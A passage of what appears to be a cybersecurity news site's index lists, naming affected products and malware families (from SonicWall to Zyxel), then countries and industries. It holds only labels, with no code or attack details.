SonicWall SMA 100 SonicWall SMA100 SonicWall SonicOS Sophos XG firewall devices Speed Dial [FVD] - New Tab Page, 3D, Sync Srimax Output Messenger SSH SSH (Linux) SSH services sshd SSHdInjector Stark Industries Solutions Inc. StealC Steam Stuxnet Substations (Ukraine Grid) sudo utility Sungrow WiNet and Logger1000 devices Susie Wiles' Personal Cellphone svchost.exe SyncBackFree system-health-sync-api SystemBC systemd-coredump T-Life app (Android and Apple versions) Tata Consultancy Services (TCS) taya TBK DVR devices TBK DVR-4104 and DVR-4216 TBK DVR-4104 and DVR-4216 digital video recording devices TBK DVRs TCM ADD TeamViewer Teapot Stealer telecommunications networks Telecommunications networks Telecommunications Systems Telegram TeleMessage TM SGNL Tenable Network Monitor Tenable One TerraStealer v2 The North Face The North Face Customer Accounts on thenorthface.com thenorthface.com ThinManager TikTok TikTok Internal APIs TP-Link TP-Link Archer AX21 TravelArrow – Your Virtual Travel Agent Triada modular backdoor Trickbot TrickBot Trojan-Banker.AndroidOS.Bankurt.c Trojan-Banker.AndroidOS.Mamont Trojan-Downloader.AndroidOS.Dwphon.a Trojan.AndroidOS.Triada.fe Trojan.AndroidOS.Triada.ga Trojan.AndroidOS.Triada.gn Trojan.AndroidOS.Triada.gs Trojan.AndroidOS.Triada.hf TrueOnline ZyXEL P660HN-T v1 router Trust Wallet Tupolev Servers Tupolev Website Tuya communications module software TV streaming devices, digital projectors, aftermarket vehicle infotainment systems, digital picture frames Ukrainian IP addresses United Natural Foods IT systems Unnamed US telecommunications company Unspecified Classified Workstation Software Unspecified Cloud Providers' IP Address Services Unspecified Communications System Unspecified DIA Internal Systems/Applications Unspecified Libraries Unspecified Remote Access Software Unspecified Remote Access Tools Unspecified USB Drive Formatting/File System US water facilities US-based tax preparation companies' systems Vanta vBulletin vBulletin 
(versions affected not specified) vBulletin forum software Victoria's Secret corporate systems Victoria's Secret e-commerce website Victoria's Secret Website Vidar Video surveillance devices Virtual Private Networks (VPNs) vkrnlintvsp.sys driver VMware VMware Aria Operations for Networks VMware ESXi VMware vCenter Server Vodafone's hotline Voice Calls Volkswagen App W2V2-AASIST W32.Ramnit Wallet software Watch2Gether Wazuh Wazuh Security Platform Wazuh Server Wealth Management Platforms Web browsers Web Browsers Web Developers' Code Repository (Unspecified) Web Honeypot Web server software (Unspecified) Web Servers Web shells (PHP) Web-facing assets (DNS, web portals, login pages) WebBrowserPassView Webcams running Linux-based operating system WebView WhatsApp Whisper Wiles' personal phone Win32.Worm.Sohanad Wind River VxWorks Wind River VxWorks 7 Windows Windows 10 Windows 11 Windows 11 (22H2 and 23H2) Windows APIs Windows Defender Windows File System Indexer Windows LNK files Windows PowerShell Windows Server Windows Server 2025 Windows Server 2025 dMSA feature Windows servers (including Active Directory) Windows Update (Implied) Windows Update Stack Windows Updates (fake) Windows Workflow Foundation (WF) Winnti WinRAR Wiser AvatarOn 6K Freelocate and Wiser Cuadro H 5P Socket WOLFBOX Level 2 EV Charger WooCommerce WordPress WordPress caching plugin wp-runtime-cache WordPress Depicter Plugin WordPress File Upload plugin WordPress plugin disguised as a security tool WordPress Plugins and Themes Workplace Xbox Live xlsx-to-json-lh xlsx-to-json-lh (npm) XWorm RAT XZ utils xz-utils compression library Yandex Browser Android App Yandex Maps Android App YouTube YouTube API Zerolot Zimbra Collaboration Zimbra Collaboration Suite ZKTeco BioTime Zoom ZTA Microsoft Windows Common Log File System (CLFS) Driver ZTE ZXV10 H108L routers Zyxel Zyxel firewalls Zyxel Firewalls
Involved Countries
Afghanistan Africa Albania Algeria Argentina Asia Australia Austria Azerbaijan Bahamas Bangladesh Belarus Belgium Benin Brazil Bulgaria Burundi California Cambodia Cameroon Canada Chile China Colombia Colorado Costa Rica Cuba Czech Republic Denmark Dominican Republic Ecuador Egypt El Salvador England Estonia Ethiopia EU EU (European Union) Europe European Union Finland Florida France Gabon Germany Great Britain Greece Hong Kong Hungary India Indonesia Iowa Iran Iraq Ireland Israel Italy Japan Jordan Kazakhstan Kyrgyzstan Laos Lebanon Libya Linux Lithuania Madagascar Malaysia Massachusetts Mauritius Mexico Microsoft Middle East Moldova Morocco Myanmar Namibia NATO Nepal Netherlands New York New Zealand Nicaragua Niger Nigeria North America North Korea North Macedonia Oman Pakistan Palestine Panama Peru Philippines Poland Portugal Romania Russia Russian Federation Rwanda Saudi Arabia Senegal Serbia Seychelles Singapore Slovakia Slovenia South Africa South Asia South Asian government South Korea Spain Sri Lanka Sweden Switzerland Syria Taiwan Tajikistan Tanzania Texas Thailand The Netherlands Tunisia Turkey Turkmenistan U.K. U.S. Uganda UK Ukraine United Arab Emirates United Kingdom United States United States of America Unspecified 'friendly foreign government' US USA Uzbekistan Vietnam Wales Yemen
Affected Industries
Adult Entertainment Advertising Advertising and Marketing Aerospace Agriculture Agriculture and Food Production AI Security Aircraft Airlines API (Application Programming Interface) Artificial Intelligence Artificial Intelligence (AI) ASP.NET Software Development Automotive Aviation Banking Biotech Biotechnology Blockchain Technology Building Business Business Services Businesses Certification Authorities (CAs) Chemical Cloud Computing Cloud Infrastructure Cloud Security Cloud Services Coffee Shops Commercial Facilities Compliance Construction and Facilities Management Consulting Consumer Electronics Consumer Services Contact Centers Corporate Corporations Credit Unions Critical Infrastructure Cryptocurrency Cryptocurrency Exchanges Cryptocurrency Investment Cryptocurrency/Finance Customer Support Cybernetics Cybersecurity Data Centers Data Storage Defense Defense and Intelligence Digital Agencies/B2B Sales Digital Certification Services Digital Forensics Digital Identity Digital Platforms Digital Video Recording Digital Video Recording (DVR) Devices Diplomatic Entities Diplomatic Organizations Disability and Health Equipment Diverse Businesses Document Management Domain Name System (DNS) Providers E-commerce E-Commerce Education Education (K-12 Schools) Education (Universities) Elections Electric Vehicle (EV) Charging Electric Vehicle (EV) Charging Infrastructure Electric Vehicle Charging Electric Vehicle Charging Infrastructure Electronics Emergency Services Emergency Services Sector (ESS) Energy Energy and Utilities Energy Production Energy/Utilities Engineering schools Engineering Schools Enterprise Enterprise Browser Security Entertainment Entertainment (Streaming Services) ERP Essential Services Farming Fashion Federal Civilian Executive Branch Federal Civilian Executive Branch (FCEB) Federal Civilian Executive Branch (FCEB) agencies Federal Government Finance Finance/Banking Financial Financial Industry Financial Institutions
Financial services Financial Services Financial Services (Broader than just Banking) Financial Services (Cryptocurrency) Financial Services (Cryptocurrency): Financial Services (specifically Cryptocurrency Investment) Financial Services (Specifically Cryptocurrency Investment) Financial Systems Financial Technology Financial Technology (Fintech) Financial Technology (FinTech) Fintech Food and Accommodation Food Distribution Food Distribution/Supply Chain Food Services Food Wholesale Fortune 500 Forums/Online Communities Gaming Gladinet CentreStack/Triofox Users Government Government (Intelligence) Government Facilities Government Organizations Government Services Government Services and Facilities Government/Intelligence Healthcare Healthcare (Hospitals) Healthcare and Public Health High Technology Higher Education Higher Education (Universities) Home Security Hospitality Hosting Hosting Providers Hotel Chains Human Resources Identity Security Individuals/Personal Users Industrial Industrial Automation Industrial Control Systems Industrial Control Systems (ICS) Industrial enterprises Industrial Enterprises Industrial Systems Information sector Information Security Information Technology Information Technology (IT) Instrumentation Insurance Intelligence Internet Infrastructure Internet Infrastructure/Hosting Services Internet of Things (IoT) Internet of Things (IoT) Devices Internet Service Provider (ISP) Internet Service Providers (ISPs) Investment IoT Devices IT IT Companies IT Infrastructure Management IT Management Software IT Operations IT Outsourcing IT Security IT Services IT Services and Logistics IT Support and Managed Services Jewelry Journalism Law Enforcement Law Firms Legal Legal Services Lingerie Local Government Logistics Managed Security Service Providers (MSPs) Managed Service Providers Managed Service Providers (MSPs) Manufacturing Marine Maritime Logistics Mechanical Engineering Media Media and Entertainment Media and Journalism Media Organizations
Merchants Microsoft 365 Security Military Military/Defense Mobile Application Development Mobile Device Industry Mobile Device Manufacturing Mobile Device/Smartphone Manufacturing Mobile Security Municipal Government Networking Equipment Manufacturing News Media Non-Governmental Organizations (NGOs) Nonprofit Nuclear Nuclear Energy Office Automation Online Forums Online Gambling Online Retail Operational Technology (OT) Penetration Testing Pharmaceuticals Political Campaigns Political Figures Politics Pornography Industry Pornography/Adult Entertainment Power companies Private Sector Production Professional, scientific and technical services Public Sector Public Transit Publishing Ransomware Remote Monitoring and Management (RMM) Software Research Restaurants Retail Robotics Router Manufacturers Router Manufacturing Scientific Search Engine Security Security/Surveillance Shared Hosting Shipping Small and Medium Businesses (SMBs) Small and Medium-sized Businesses (SMBs) Small Businesses Smart Device Manufacturers Smart Home Industry Social Media Software Software as a Service (SaaS) Software Development Software Industry Software Supply Chain Software-as-a-service (SaaS) Software/AI Tool Development Space Exploration Surveillance Technology Tax Preparation Tax Resolution Services Tech Tech Companies Technology Technology (XR/AR/VR) Technology Manufacturing Telecommunications Third-Party IT Services Ticketing and Entertainment Transport Transportation Transportation/Logistics Travel Travel Agencies Travel and Recreation Travel Industry Universities Vehicle Insurance Video Game Video Game Industry Video Games Virtual Currency Investment Virtualization VPN (Virtual Private Network) VPN and Proxy Services VPN Services Water Water and Wastewater Water and Wastewater Systems Water Systems Water Utilities Web Applications Web Hosting Web Hosting/Internet Infrastructure Web Infrastructure Web Security Web Server Hosting Web3 Website Operators WordPress Plugin Developers/Users